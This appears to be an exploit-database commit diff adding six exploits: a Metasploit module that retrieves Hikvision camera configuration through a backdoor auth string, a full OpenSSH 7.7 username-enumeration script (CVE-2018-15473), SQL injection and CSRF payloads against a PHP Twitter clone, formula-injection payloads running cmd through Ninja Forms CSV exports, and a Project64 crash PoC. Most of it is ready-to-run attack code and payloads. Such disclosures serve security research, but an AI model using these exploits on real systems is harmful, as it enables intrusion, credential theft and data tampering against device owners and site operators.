DB: 2018-08-22

6 changes to exploits/shellcodes

Project64 2.3.2 - Denial Of Service (PoC)

Easylogin Pro 1.3.0 - Encryptor.php Unserialize Remote Code Execution
Easylogin Pro 1.3.0 - 'Encryptor.php' Unserialize Remote Code Execution
OpenSSH 7.7 - Username Enumeration

WordPress Plugin Tagregator 0.6 - Cross-Site Scripting
Twitter-Clone 1 - 'userid' SQL Injection
Hikvision IP Camera 5.4.0 - User Enumeration (Metasploit)
Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)
Wordpress Plugin Ninja Forms 3.3.13 - CSV Injection

exploits/hardware/webapps/45231.rb

@@ -0,0 +1,77 @@
+# Exploit title: Hikvision IP Camera 5.4.0 - User Enumeration (Metasploit)
+# Author: Alfie
+# Date: 2018-08-21
+# Website: https://www.hikvision.com/en/
+# Software: Hikvision Camera
+# Versions: 
+# DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 160530
+# DS-2CD2xx0F-I Series: V5.2.0 build 140721 to V5.4.0 Build 160401
+# DS-2CD2xx2FWD Series: V5.3.1 build 150410 to V5.4.4 Build 161125
+# DS-2CD4x2xFWD Series: V5.2.0 build 140721 to V5.4.0 Build 160414
+# DS-2CD4xx5 Series: V5.2.0 build 140721 to V5.4.0 Build 160421
+# DS-2DFx Series: V5.2.0 build 140805 to V5.4.5 Build 160928
+# DS-2CD63xx Series: V5.0.9 build 140305 to V5.3.5 Build 160106
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Configuration download in Hikvision IP Cameras',
+      'Description'    => %q{
+          Many Hikvision IP cameras contain a backdoor that allows unauthenticated impersonation of any configured user account. The vulnerability has been present in Hikvision products since at least 2014. In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names. Hundreds of thousands of vulnerable devices are still exposed to the Internet at the time of publishing. In addition to gaining full administrative access, the vulnerability can be used to retrieve plain-text passwords for all configured users.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => 
+        [
+          'Monte Crypto', # Vulnerability discovery
+          'Alfie Njeru' # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html' ],
+        
+          [ 'URL', 'http://seclists.org/fulldisclosure/2017/Sep/23' ]
+        ]
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'Path to the path that config is stored ', '/System/configurationFile?auth=YWRtaW46MTEK'])
+      ])
+  end
+
+  def run_host(ip)
+
+    print_status("#{rhost}:#{rport} - Sending request...")
+    uri = normalize_uri(target_uri.path)
+    res = send_request_cgi({
+      'uri'          => uri,
+      'method'       => 'GET',
+    })
+
+    if res and res.code == 200
+      contents = res.body
+      fname = File.basename(datastore['TARGETURI'])
+      path = store_loot(
+        'usersvision ',
+        'text/plain',
+        ip,
+        contents,
+        fname
+      )
+      print_status("#{rhost}:#{rport} - File saved in: #{path}")
+    else
+      print_error("#{rhost}:#{rport} - Failed to retrieve file")
+      return
+    end
+  end
+end

exploits/linux/remote/45233.py

@@ -0,0 +1,165 @@
+# Exploit: OpenSSH 7.7 - Username Enumeration
+# Author: Justin Gardner
+# Date: 2018-08-20
+# Software: https://ftp4.usa.openbsd.org/pub/OpenBSD/OpenSSH/openssh-7.7.tar.gz
+# Affected Versions: OpenSSH version < 7.7
+# CVE: CVE-2018-15473
+
+###########################################################################
+#                ____                    _____ _____ _    _               #
+#               / __ \                  / ____/ ____| |  | |              #
+#              | |  | |_ __   ___ _ __ | (___| (___ | |__| |              #
+#              | |  | | '_ \ / _ \ '_ \ \___ \\___ \|  __  |              #
+#              | |__| | |_) |  __/ | | |____) |___) | |  | |              #
+#               \____/| .__/ \___|_| |_|_____/_____/|_|  |_|              #
+#                     | |               Username Enumeration              #
+#                     |_|                                                 #
+#                                                                         #
+###########################################################################
+
+#!/usr/bin/env python
+
+import argparse
+import logging
+import paramiko
+import multiprocessing
+import socket
+import sys
+import json
+# store function we will overwrite to malform the packet
+old_parse_service_accept = paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_SERVICE_ACCEPT]
+
+# create custom exception
+class BadUsername(Exception):
+    def __init__(self):
+	pass
+
+# create malicious "add_boolean" function to malform packet
+def add_boolean(*args, **kwargs):
+    pass
+
+# create function to call when username was invalid
+def call_error(*args, **kwargs):
+    raise BadUsername()
+
+# create the malicious function to overwrite MSG_SERVICE_ACCEPT handler
+def malform_packet(*args, **kwargs):
+    old_add_boolean = paramiko.message.Message.add_boolean
+    paramiko.message.Message.add_boolean = add_boolean
+    result  = old_parse_service_accept(*args, **kwargs)
+    #return old add_boolean function so start_client will work again
+    paramiko.message.Message.add_boolean = old_add_boolean
+    return result
+
+# create function to perform authentication with malformed packet and desired username
+def checkUsername(username, tried=0):
+	sock = socket.socket()
+	sock.connect((args.hostname, args.port))
+	# instantiate transport
+	transport = paramiko.transport.Transport(sock)
+	try:
+	    transport.start_client()
+	except paramiko.ssh_exception.SSHException:
+	    # server was likely flooded, retry up to 3 times
+	    transport.close()
+	    if tried < 4:
+	    	tried += 1
+	    	return checkUsername(username, tried)
+	    else:
+	    	print '[-] Failed to negotiate SSH transport'
+	try:
+		transport.auth_publickey(username, paramiko.RSAKey.generate(1024))
+	except BadUsername:
+    		return (username, False)
+	except paramiko.ssh_exception.AuthenticationException:
+    		return (username, True)
+	#Successful auth(?)
+	raise Exception("There was an error. Is this the correct version of OpenSSH?")
+
+def exportJSON(results):
+	data = {"Valid":[], "Invalid":[]}
+	for result in results:
+		if result[1] and result[0] not in data['Valid']:
+			data['Valid'].append(result[0])
+		elif not result[1] and result[0] not in data['Invalid']:
+			data['Invalid'].append(result[0])
+	return json.dumps(data)
+
+def exportCSV(results):
+	final = "Username, Valid\n"
+	for result in results:
+		final += result[0]+", "+str(result[1])+"\n"
+	return final
+
+def exportList(results):
+	final = ""
+	for result in results:
+		if result[1]:
+			final+=result[0]+" is a valid user!\n"
+		else:
+			final+=result[0]+" is not a valid user!\n"
+	return final
+
+# assign functions to respective handlers
+paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = malform_packet
+paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = call_error
+
+# get rid of paramiko logging
+logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
+
+arg_parser = argparse.ArgumentParser()
+arg_parser.add_argument('hostname', type=str, help="The target hostname or ip address")
+arg_parser.add_argument('--port', type=int, default=22, help="The target port")
+arg_parser.add_argument('--threads', type=int, default=5, help="The number of threads to be used")
+arg_parser.add_argument('--outputFile', type=str, help="The output file location")
+arg_parser.add_argument('--outputFormat', choices=['list', 'json', 'csv'], default='list', type=str, help="The output file location")
+group = arg_parser.add_mutually_exclusive_group(required=True)
+group.add_argument('--username', type=str, help="The single username to validate")
+group.add_argument('--userList', type=str, help="The list of usernames (one per line) to enumerate through")
+args = arg_parser.parse_args()
+
+sock = socket.socket()
+try:
+    sock.connect((args.hostname, args.port))
+    sock.close()
+except socket.error:
+    print '[-] Connecting to host failed. Please check the specified host and port.'
+    sys.exit(1)
+
+if args.username: #single username passed in
+	result = checkUsername(args.username)
+	if result[1]:
+		print result[0]+" is a valid user!"
+	else:
+		print result[0]+" is not a valid user!"
+elif args.userList: #username list passed in
+	try:
+		f = open(args.userList)
+	except IOError:
+		print "[-] File doesn't exist or is unreadable."
+		sys.exit(3)
+	usernames = map(str.strip, f.readlines())
+	f.close()
+	# map usernames to their respective threads
+	pool = multiprocessing.Pool(args.threads)
+	results = pool.map(checkUsername, usernames)
+	try:
+		outputFile = open(args.outputFile, "w")
+	except IOError:
+		print "[-] Cannot write to outputFile."
+		sys.exit(5)
+	if args.outputFormat=='list':
+		outputFile.writelines(exportList(results))
+		print "[+] Results successfully written to " + args.outputFile + " in List form."
+	elif args.outputFormat=='json':
+		outputFile.writelines(exportJSON(results))
+		print "[+] Results successfully written to " + args.outputFile + " in JSON form."
+	elif args.outputFormat=='csv':
+		outputFile.writelines(exportCSV(results))
+		print "[+] Results successfully written to " + args.outputFile + " in CSV form."
+	else:
+		print "".join(results)
+	outputFile.close()
+else: # no usernames passed in
+	print "[-] No usernames provided to check"
+	sys.exit(4)

exploits/php/webapps/45230.txt

@@ -0,0 +1,51 @@
+# Exploit Title: Twitter-Clone 1 - 'userid' SQL Injection
+# Date: 2018-08-21
+# Exploit Author: L0RD
+# Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/
+# Version: 1
+# CVE: N/A
+# Tested on: Win 10
+
+# POC : SQLi
+# vulnerable files : follow.php , index.php
+# vulnerable parameters : userid , username
+
+# 1) follow.php :
+
+# Parameters : userid , username
+# Type : Union query
+# Type : Time-based blind
+# Payloads :
+
+userid: ' UNION SELECT 1,2,user(),4,database(),6,7%23
+username: ' AND sleep(10)%23
+
+# vulnerable code :
+
+if($_GET['userid']  && $_GET['username']){
+if($_GET['userid']!=$user_id){
+$follow_userid = $_GET['userid'];
+$follow_username = $_GET['username'];
+include 'connect.php';
+$query = mysqli_query($con, "SELECT id
+    FROM following
+WHERE user1_id='$user_id' AND user2_id='$follow_userid'
+");
+
+# 2) index.php :
+
+# vulnerable parameter : username
+# Type : Union query
+# Payload : 
+
+' union select 1,2,user(),4,5,6
+
+# vulnerable code :
+
+if($_POST['login-btn']=="login-submit"){
+if($_POST['username'] != "" && $_POST['password'] != ""){
+$username = strtolower($_POST['username']);
+include "connect.php";
+$query = mysqli_query($con, "SELECT id, password
+FROM users
+ WHERE username='$username'");

exploits/php/webapps/45232.txt

@@ -0,0 +1,29 @@
+# Exploit Title: Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)
+# Date: 2018-08-21
+# Exploit Author: L0RD
+# Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/
+# Version: 1
+# CVE: N/A
+# Tested on: Win 10
+
+# Description :
+# An issue was discovered in Twitter-Clone 1 which allows a remote
+# attacker to force any victim to delete posts.
+
+# POC :
+# Delete posts exploit :
+
+<html>
+<head>
+   <title>POC</title>
+</head>
+<body>
+<form action='http://127.0.0.1/clone/twitter-clone/tweetdel.php?id="set
+tweet id here of any post' method='post'>
+  <input type='hidden' name='id' value='set tweet id here of any post' />
+</form>
+   <script>
+      document.forms[0].submit();
+   </script>
+</body>
+</html>

exploits/php/webapps/45234.txt

@@ -0,0 +1,33 @@
+# Exploit Title: Wordpress Plugin Ninja Forms 3.3.13 - CSV Injection
+# Exploit Author: Mostafa Gharzi
+# Website: https://www.certcc.ir
+# Date: 2018-08-19
+# Google Dork: N/A
+# Vendor: The WP Ninjas
+# Software Link: https://wordpress.org/plugins/ninja-forms/
+# Affected Version: 3.3.13 and before
+# Active installations: 1+ million
+# Patched Version: unpatched
+# Category: Web Application
+# Platform: PHP
+# Tested on: Win10x64 & Kali Linux
+
+# 1. Technical Description:
+# WordPress Ninja Forms plugin version 3.3.13 and before are affected by Remote Code Execution
+# through the CSV injection vulnerability. This allows an application user
+# to inject commands as part of the fields of forms and these commands are executed when a user with
+# greater privilege exports the data in CSV and opens that file on his machine.
+
+# 2. Proof Of Concept (PoC):
+# Enter the payload =SUM(1+1)*cmd|' /C calc'!A0 in any field of the form,
+# for example, in name field.
+# When the user with high privileges logs in to the application, export
+# data in CSV and opens the
+# generated file, the command is executed and the calculator will run open
+# on the machine.
+
+# 3. Payloads:
+=SUM(1+1)*cmd|' /C calc'!A0
++SUM(1+1)*cmd|' /C calc'!A0
+-SUM(1+1)*cmd|' /C calc'!A0
+@SUM(1+1)*cmd|' /C calc'!A0

exploits/windows_x86/dos/45229.txt

@@ -0,0 +1,25 @@
+# Exploit Title: Project64 2.3.2  - Denial Of Service (PoC).
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-08-21
+# Homepage: https://www.pj64-emu.com
+# Software Link:https://www.pj64-emu.com/download/project64-latest
+# Tested Version: 2.3.2
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the program. In the new window click "Options" > "Settings" > "Directories". Now paste the content of 
+# "exploit.txt" into the field:"Plugin Directory" and make sure it is selected. Click "Apply" > "Ok" and then reopen "Options" > "Settings" you will see a crash.
+
+#!/usr/bin/python
+   
+buffer = "A" * 6000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

files_exploits.csv

@@ -6059,6 +6059,7 @@ id,file,description,date,author,type,platform,port
 45222,exploits/windows_x86-64/dos/45222.py,"Zortam MP3 Media Studio 23.95 - Denial of Service (PoC)",2018-08-20,"Gionathan Reale",dos,windows_x86-64,
 45223,exploits/windows_x86-64/dos/45223.py,"Restorator 1793 - Denial of Service (PoC)",2018-08-20,"Gionathan Reale",dos,windows_x86-64,
 45226,exploits/windows_x86/dos/45226.py,"Prime95 29.4b7 - Denial Of Service (PoC)",2018-08-20,"Gionathan Reale",dos,windows_x86,
+45229,exploits/windows_x86/dos/45229.txt,"Project64 2.3.2 - Denial Of Service (PoC)",2018-08-21,"Gionathan Reale",dos,windows_x86,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -16706,7 +16707,8 @@ id,file,description,date,author,type,platform,port
 45210,exploits/linux/remote/45210.py,"OpenSSH 2.3 < 7.4 - Username Enumeration (PoC)",2018-08-16,"Matthew Daley",remote,linux,
 45218,exploits/windows_x86/remote/45218.py,"SEIG SCADA System 9 - Remote Code Execution",2018-08-19,"Alejandro Parodi",remote,windows_x86,12397
 45220,exploits/windows_x86/remote/45220.py,"SEIG Modbus 3.4 - Remote Code Execution",2018-08-20,"Alejandro Parodi",remote,windows_x86,
-45227,exploits/php/remote/45227.php,"Easylogin Pro 1.3.0 - Encryptor.php Unserialize Remote Code Execution",2018-08-20,mr_me,remote,php,
+45227,exploits/php/remote/45227.php,"Easylogin Pro 1.3.0 - 'Encryptor.php' Unserialize Remote Code Execution",2018-08-20,mr_me,remote,php,
+45233,exploits/linux/remote/45233.py,"OpenSSH 7.7 - Username Enumeration",2018-08-21,"Justin Gardner",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39826,5 +39828,9 @@ id,file,description,date,author,type,platform,port
 45212,exploits/hardware/webapps/45212.py,"ADM 3.1.2RHG1 - Remote Code Execution",2018-08-17,"Matthew Fulton",webapps,hardware,443
 45221,exploits/php/webapps/45221.txt,"WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection",2018-08-20,"Çlirim Emini",webapps,php,80
 45224,exploits/php/webapps/45224.txt,"MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery",2018-08-20,0xB9,webapps,php,80
-45225,exploits/php/webapps/45225.txt,"WordPress Plugin Tagregator 0.6 - Cross-Site Scripting",2018-08-20,ManhNho,webapps,php,
+45225,exploits/php/webapps/45225.txt,"WordPress Plugin Tagregator 0.6 - Cross-Site Scripting",2018-08-20,ManhNho,webapps,php,80
 45228,exploits/php/webapps/45228.txt,"Countly - Persistent Cross-Site Scripting",2018-08-20,Sleepy,webapps,php,
+45230,exploits/php/webapps/45230.txt,"Twitter-Clone 1 - 'userid' SQL Injection",2018-08-21,L0RD,webapps,php,80
+45231,exploits/hardware/webapps/45231.rb,"Hikvision IP Camera 5.4.0 - User Enumeration (Metasploit)",2018-08-21,Alfie,webapps,hardware,
+45232,exploits/php/webapps/45232.txt,"Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)",2018-08-21,L0RD,webapps,php,
+45234,exploits/php/webapps/45234.txt,"Wordpress Plugin Ninja Forms 3.3.13 - CSV Injection",2018-08-21,"Mostafa Gharzi",webapps,php,